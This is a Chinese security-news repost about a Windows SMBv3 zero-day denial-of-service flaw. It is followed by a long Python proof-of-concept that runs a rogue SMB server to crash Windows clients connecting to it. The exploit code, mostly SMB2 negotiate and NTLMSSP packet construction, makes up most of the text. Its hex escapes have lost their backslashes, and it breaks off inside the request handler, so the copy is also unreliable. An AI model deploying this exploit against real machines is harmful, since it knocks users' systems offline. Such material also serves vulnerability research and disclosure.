微慑信息网

Windows SMBv3 协议曝 0day,可导致拒绝服务攻击危害用户系统

据 Seebug 漏洞平台消息,昨日美国计算机应急响应小组(US-CERT)披露了关于 Microsoft Windows SMBv3 协议的一个新 0day攻击者可通过诱使用户访问伪造的 SMB 服务端,从而进行拒绝服务攻击,最终危害到用户的系统。但目前还没有更详细的漏洞细节披露。

SMB 是一个网络文件共享协议,它允许应用程序和终端用户从远端的文件服务器访问文件资源。

漏洞影响版本:
Windows Server 2012、Windows Server 2016 以及 Windows 10 其它版本可能也受影响。

漏洞测试环境:

PoC 运行的服务端:Ubuntu 16.04 x64
测试客户端:Windows 10 x64

漏洞 PoC 请戳此处

漏洞复现

在 Ubuntu 下执行 PoC 脚本来模拟 SMB 服务端并等待客户端的连接:

wechatimg020306

在客户端 Windows 10 上访问该 SMB 服务端:

wechatimg020307

最终将触发漏洞从而导致系统的崩溃:

wechatimg020308

稿源:Seebug;封面:百度搜索

 

from hackernews.cc.thanks for it.

拓展阅读(点评/知识):

POC:

import sys, struct, SocketServer
from odict import OrderedDict
from datetime import datetime
from calendar import timegm

class Packet():
    fields = OrderedDict([
        ("data", ""),
    ])
    def __init__(self, **kw):
        self.fields = OrderedDict(self.__class__.fields)
        for k,v in kw.items():
            if callable(v):
                self.fields[k] = v(self.fields[k])
            else:
                self.fields[k] = v
    def __str__(self):
        return "".join(map(str, self.fields.values()))

def NTStamp(Time):
    NtStamp = 116444736000000000 + (timegm(Time.timetuple()) * 10000000)
    return struct.pack("Q", NtStamp + (Time.microsecond * 10))

def longueur(payload):
    length = struct.pack(">i", len(''.join(payload)))
    return length

def GrabMessageID(data):
    Messageid = data[28:36]
    return Messageid

def GrabCreditRequested(data):
    CreditsRequested = data[18:20]
    if CreditsRequested == "x00x00":
       CreditsRequested =  "x01x00"
    else:
       CreditsRequested = data[18:20]
    return CreditsRequested

def GrabCreditCharged(data):
    CreditCharged = data[10:12]
    return CreditCharged

def GrabSessionID(data):
    SessionID = data[44:52]
    return SessionID

##################################################################################
class SMBv2Header(Packet):
    fields = OrderedDict([
        ("Proto",         "xfex53x4dx42"),
        ("Len",           "x40x00"),
        ("CreditCharge",  "x00x00"),
        ("NTStatus",      "x00x00x00x00"),
        ("Cmd",           "x00x00"),
        ("Credits",       "x01x00"),
        ("Flags",         "x01x00x00x00"),
        ("NextCmd",       "x00x00x00x00"),
        ("MessageId",     "x00x00x00x00x00x00x00x00"),
        ("PID",           "xffxfex00x00"),
        ("TID",           "x00x00x00x00"),
        ("SessionID",     "x00x00x00x00x00x00x00x00"),
        ("Signature",     "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"),
    ])

##################################################################################
class SMB2NegoAns(Packet):
	fields = OrderedDict([
		("Len",             "x41x00"),
		("Signing",         "x01x00"),
		("Dialect",         "xffx02"),
		("Reserved",        "x00x00"),
		("Guid",            "xeax85xabxf1xeaxf6x0cx4fx92x81x92x47x6dxebx72xa9"),
		("Capabilities",    "x07x00x00x00"),
		("MaxTransSize",    "x00x00x10x00"),
		("MaxReadSize",     "x00x00x10x00"),
		("MaxWriteSize",    "x00x00x10x00"),
		("SystemTime",      NTStamp(datetime.now())),
		("BootTime",        "x22xfbx80x01x40x09xd2x01"),
		("SecBlobOffSet",             "x80x00"),
		("SecBlobLen",                "x78x00"),
		("Reserved2",                 "x4dx53x53x50"),
		("InitContextTokenASNId",     "x60"),
		("InitContextTokenASNLen",    "x76"),
		("ThisMechASNId",             "x06"),
		("ThisMechASNLen",            "x06"),
		("ThisMechASNStr",            "x2bx06x01x05x05x02"),
		("SpNegoTokenASNId",          "xA0"),
		("SpNegoTokenASNLen",         "x6c"),
		("NegTokenASNId",             "x30"),
		("NegTokenASNLen",            "x6a"),
		("NegTokenTag0ASNId",         "xA0"),
		("NegTokenTag0ASNLen",        "x3c"),
		("NegThisMechASNId",          "x30"),
		("NegThisMechASNLen",         "x3a"),
		("NegThisMech1ASNId",         "x06"),
		("NegThisMech1ASNLen",        "x0a"),
		("NegThisMech1ASNStr",        "x2bx06x01x04x01x82x37x02x02x1e"),
		("NegThisMech2ASNId",         "x06"),
		("NegThisMech2ASNLen",        "x09"),
		("NegThisMech2ASNStr",        "x2ax86x48x82xf7x12x01x02x02"),
		("NegThisMech3ASNId",         "x06"),
		("NegThisMech3ASNLen",        "x09"),
		("NegThisMech3ASNStr",        "x2ax86x48x86xf7x12x01x02x02"),
		("NegThisMech4ASNId",         "x06"),
		("NegThisMech4ASNLen",        "x0a"),
		("NegThisMech4ASNStr",        "x2ax86x48x86xf7x12x01x02x02x03"),
		("NegThisMech5ASNId",         "x06"),
		("NegThisMech5ASNLen",        "x0a"),
		("NegThisMech5ASNStr",        "x2bx06x01x04x01x82x37x02x02x0a"),
		("NegTokenTag3ASNId",         "xA3"),
		("NegTokenTag3ASNLen",        "x2a"),
		("NegHintASNId",              "x30"),
		("NegHintASNLen",             "x28"),
		("NegHintTag0ASNId",          "xa0"),
		("NegHintTag0ASNLen",         "x26"),
		("NegHintFinalASNId",         "x1b"), 
		("NegHintFinalASNLen",        "x24"),
		("NegHintFinalASNStr",        "[email protected]"),
		("Data",                      ""),
	])

	def calculate(self):


		StructLen = str(self.fields["Len"])+str(self.fields["Signing"])+str(self.fields["Dialect"])+str(self.fields["Reserved"])+str(self.fields["Guid"])+str(self.fields["Capabilities"])+str(self.fields["MaxTransSize"])+str(self.fields["MaxReadSize"])+str(self.fields["MaxWriteSize"])+str(self.fields["SystemTime"])+str(self.fields["BootTime"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])+str(self.fields["Reserved2"])
                 
		SecBlobLen = str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])


		AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])

		AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])

		MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])

		Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])

                #Sec Blob lens
		self.fields["SecBlobOffSet"] = struct.pack("<h",len(StructLen)+64)
		self.fields["SecBlobLen"] = struct.pack("<h",len(SecBlobLen))
                #ASN Stuff
		self.fields["InitContextTokenASNLen"] = struct.pack("<B", len(SecBlobLen)-2)
		self.fields["ThisMechASNLen"] = struct.pack("<B", len(str(self.fields["ThisMechASNStr"])))
		self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
		self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2)-2)
		self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
		self.fields["NegThisMech1ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech1ASNStr"])))
		self.fields["NegThisMech2ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech2ASNStr"])))
		self.fields["NegThisMech3ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech3ASNStr"])))
		self.fields["NegThisMech4ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech4ASNStr"])))
		self.fields["NegThisMech5ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech5ASNStr"])))
		self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
		self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len)-2)
		self.fields["NegHintTag0ASNLen"] = struct.pack("<B", len(Tag3Len)-4)
		self.fields["NegHintFinalASNLen"] = struct.pack("<B", len(str(self.fields["NegHintFinalASNStr"])))

##################################################################################
class SMB2Session1Data(Packet):
	fields = OrderedDict([
		("Len",             "x09x00"),
		("SessionFlag",     "x01x00"),
		("SecBlobOffSet",   "x48x00"),
		("SecBlobLen",      "x06x01"),
		("ChoiceTagASNId",        "xa1"), 
		("ChoiceTagASNLenOfLen",  "x82"), 
		("ChoiceTagASNIdLen",     "x01x02"),
		("NegTokenTagASNId",      "x30"),
		("NegTokenTagASNLenOfLen","x81"),
		("NegTokenTagASNIdLen",   "xff"),
		("Tag0ASNId",             "xA0"),
		("Tag0ASNIdLen",          "x03"),
		("NegoStateASNId",        "x0A"),
		("NegoStateASNLen",       "x01"),
		("NegoStateASNValue",     "x01"),
		("Tag1ASNId",             "xA1"),
		("Tag1ASNIdLen",          "x0c"),
		("Tag1ASNId2",            "x06"),
		("Tag1ASNId2Len",         "x0A"),
		("Tag1ASNId2Str",         "x2bx06x01x04x01x82x37x02x02x0a"),
		("Tag2ASNId",             "xA2"),
		("Tag2ASNIdLenOfLen",     "x81"),
		("Tag2ASNIdLen",          "xE9"),
		("Tag3ASNId",             "x04"),
		("Tag3ASNIdLenOfLen",     "x81"),
		("Tag3ASNIdLen",          "xE6"),
		("NTLMSSPSignature",      "NTLMSSP"),
		("NTLMSSPSignatureNull",  "x00"),
		("NTLMSSPMessageType",    "x02x00x00x00"),
		("NTLMSSPNtWorkstationLen","x1ex00"),
		("NTLMSSPNtWorkstationMaxLen","x1ex00"),
		("NTLMSSPNtWorkstationBuffOffset","x38x00x00x00"),
		("NTLMSSPNtNegotiateFlags","x15x82x89xe2"),
		("NTLMSSPNtServerChallenge","x82x21x32x14x51x46xe2x83"),
		("NTLMSSPNtReserved","x00x00x00x00x00x00x00x00"),
		("NTLMSSPNtTargetInfoLen","x94x00"),
		("NTLMSSPNtTargetInfoMaxLen","x94x00"),
		("NTLMSSPNtTargetInfoBuffOffset","x56x00x00x00"),
		("NegTokenInitSeqMechMessageVersionHigh","x06"),
		("NegTokenInitSeqMechMessageVersionLow","x03"),
		("NegTokenInitSeqMechMessageVersionBuilt","x80x25"),
		("NegTokenInitSeqMechMessageVersionReserved","x00x00x00"),
		("NegTokenInitSeqMechMessageVersionNTLMType","x0f"),
		("NTLMSSPNtWorkstationName","SMB3"),
		("NTLMSSPNTLMChallengeAVPairsId","x02x00"),
		("NTLMSSPNTLMChallengeAVPairsLen","x0ax00"),
		("NTLMSSPNTLMChallengeAVPairsUnicodeStr","SMB5"),
		("NTLMSSPNTLMChallengeAVPairs1Id","x01x00"),
		("NTLMSSPNTLMChallengeAVPairs1Len","x1ex00"),
		("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","WIN-PRH502RQAFV"), 
		("NTLMSSPNTLMChallengeAVPairs2Id","x04x00"),
		("NTLMSSPNTLMChallengeAVPairs2Len","x1ex00"),
		("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","SMB5.local"), 
		("NTLMSSPNTLMChallengeAVPairs3Id","x03x00"),
		("NTLMSSPNTLMChallengeAVPairs3Len","x1ex00"),
		("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","WIN-PRH502RQAFV.SMB5.local"),
		("NTLMSSPNTLMChallengeAVPairs5Id","x05x00"),
		("NTLMSSPNTLMChallengeAVPairs5Len","x04x00"),
		("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","SMB5.local"),
		("NTLMSSPNTLMChallengeAVPairs7Id","x07x00"),
		("NTLMSSPNTLMChallengeAVPairs7Len","x08x00"),
		("NTLMSSPNTLMChallengeAVPairs7UnicodeStr",NTStamp(datetime.now())),
		("NTLMSSPNTLMChallengeAVPairs6Id","x00x00"),
		("NTLMSSPNTLMChallengeAVPairs6Len","x00x00"),
	])


	def calculate(self):
		###### Convert strings to Unicode
		self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le')
		self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
		self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
		self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
		self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
		self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
                
                #Packet struct calc:
		StructLen = str(self.fields["Len"])+str(self.fields["SessionFlag"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])
		###### SecBlobLen Calc:
		CalculateSecBlob = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NTLMSSPNtWorkstationName"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])

		AsnLen = str(self.fields["ChoiceTagASNId"])+str(self.fields["ChoiceTagASNLenOfLen"])+str(self.fields["ChoiceTagASNIdLen"])+str(self.fields["NegTokenTagASNId"])+str(self.fields["NegTokenTagASNLenOfLen"])+str(self.fields["NegTokenTagASNIdLen"])+str(self.fields["Tag0ASNId"])+str(self.fields["Tag0ASNIdLen"])+str(self.fields["NegoStateASNId"])+str(self.fields["NegoStateASNLen"])+str(self.fields["NegoStateASNValue"])+str(self.fields["Tag1ASNId"])+str(self.fields["Tag1ASNIdLen"])+str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])+str(self.fields["Tag2ASNId"])+str(self.fields["Tag2ASNIdLenOfLen"])+str(self.fields["Tag2ASNIdLen"])+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])


                #Packet Struct len
		self.fields["SecBlobLen"] = struct.pack("<H", len(AsnLen+CalculateSecBlob))
                self.fields["SecBlobOffSet"] = struct.pack("<h",len(StructLen)+64)

		###### ASN Stuff
                if len(CalculateSecBlob) > 255:
		   self.fields["Tag3ASNIdLen"] = struct.pack(">H", len(CalculateSecBlob))
                else:
                   self.fields["Tag3ASNIdLenOfLen"] = "x81"
		   self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob))

                if len(AsnLen+CalculateSecBlob)-3 > 255:
		   self.fields["ChoiceTagASNIdLen"] = struct.pack(">H", len(AsnLen+CalculateSecBlob)-4)
                else:
                   self.fields["ChoiceTagASNLenOfLen"] = "x81"
		   self.fields["ChoiceTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-3)

                if len(AsnLen+CalculateSecBlob)-7 > 255:
		   self.fields["NegTokenTagASNIdLen"] = struct.pack(">H", len(AsnLen+CalculateSecBlob)-8)
                else:
                   self.fields["NegTokenTagASNLenOfLen"] = "x81"
		   self.fields["NegTokenTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-7)
                
                tag2length = CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])

                if len(tag2length) > 255:
		   self.fields["Tag2ASNIdLen"] = struct.pack(">H", len(tag2length))
                else:
                   self.fields["Tag2ASNIdLenOfLen"] = "x81"
		   self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(tag2length))

		self.fields["Tag1ASNIdLen"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])))
		self.fields["Tag1ASNId2Len"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2Str"])))

		###### Workstation Offset
		CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])

		###### AvPairs Offset
		CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])

		##### Workstation Offset Calculation:
		self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation))
		self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
		self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))

		##### Target Offset Calculation:
		self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
		self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs))
		self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs))
		
		##### IvPair Calculation:
		self.fields["NTLMSSPNTLMChallengeAVPairs7Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])))
		self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
		self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
		self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
		self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
		self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))

class SMB2SessionAcceptData(Packet):
	fields = OrderedDict([
		("Len",                       "x09x00"),
		("SessionFlag",               "x01x00"),
		("SecBlobOffSet",             "x48x00"),
		("SecBlobLen",                "x1dx00"),
		("SecBlobTag0",               "xa1"), 
		("SecBlobTag0Len",            "x1b"),
		("NegTokenResp",              "x30"), 
		("NegTokenRespLen",           "x19"), 
		("NegTokenRespTag0",          "xa0"), 
		("NegTokenRespTag0Len",       "x03"), 
		("NegStateResp",              "x0a"), 
		("NegTokenRespLen1",           "x01"), 
		("NegTokenRespStr",           "x00"),
		("SecBlobTag3",               "xa3"), 
		("SecBlobTag3Len",            "x12"),
		("SecBlobOctetHeader",        "x04"), 
		("SecBlobOctetLen",           "x10"),
		("MechlistMICVersion",        ""),# No verification on the client side...
		("MechlistCheckSum",          ""),
		("MechlistSeqNumber",         ""),
                ("Data",                      ""),
    ])
	def calculate(self):

		###### SecBlobLen Calc:
		CalculateSecBlob = str(self.fields["SecBlobTag0"])+str(self.fields["SecBlobTag0Len"])+str(self.fields["NegTokenResp"])+str(self.fields["NegTokenRespLen"])+str(self.fields["NegTokenRespTag0"])+str(self.fields["NegTokenRespTag0Len"])+str(self.fields["NegStateResp"])+str(self.fields["NegTokenRespLen1"])+str(self.fields["NegTokenRespStr"])+str(self.fields["SecBlobTag3"])+str(self.fields["SecBlobTag3Len"])+str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"])

		CalculateASN = str(self.fields["NegTokenResp"])+str(self.fields["NegTokenRespLen"])+str(self.fields["NegTokenRespTag0"])+str(self.fields["NegTokenRespTag0Len"])+str(self.fields["NegStateResp"])+str(self.fields["NegTokenRespLen1"])+str(self.fields["NegTokenRespStr"])+str(self.fields["SecBlobTag3"])+str(self.fields["SecBlobTag3Len"])+str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"])

                MechLen = str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"])

                #Packet Struct len
		self.fields["SecBlobLen"] = struct.pack("<h",len(CalculateSecBlob))
		self.fields["SecBlobTag0Len"] = struct.pack("<B",len(CalculateASN))
		self.fields["NegTokenRespLen"] = struct.pack("<B", len(CalculateASN)-2)
                self.fields["SecBlobTag3Len"] = struct.pack("<B",len(MechLen))
                self.fields["SecBlobOctetLen"] = struct.pack("<B",len(MechLen)-2)

class SMB2TreeData(Packet):
    fields = OrderedDict([
		("Len",                   "x10x00"),
		("ShareType",             "x02x00"),
		("ShareFlags",            "x30x00x00x00"),
		("ShareCapabilities",     "x00x00x00x00"),
		("AccessMask",            "xffx01x1fx01"),   
		("Data",                  ""),         
    ])

##########################################################################
class SMB2(SocketServer.BaseRequestHandler):
     
    def handle(self):
        try:
              self.request.settimeout(1)
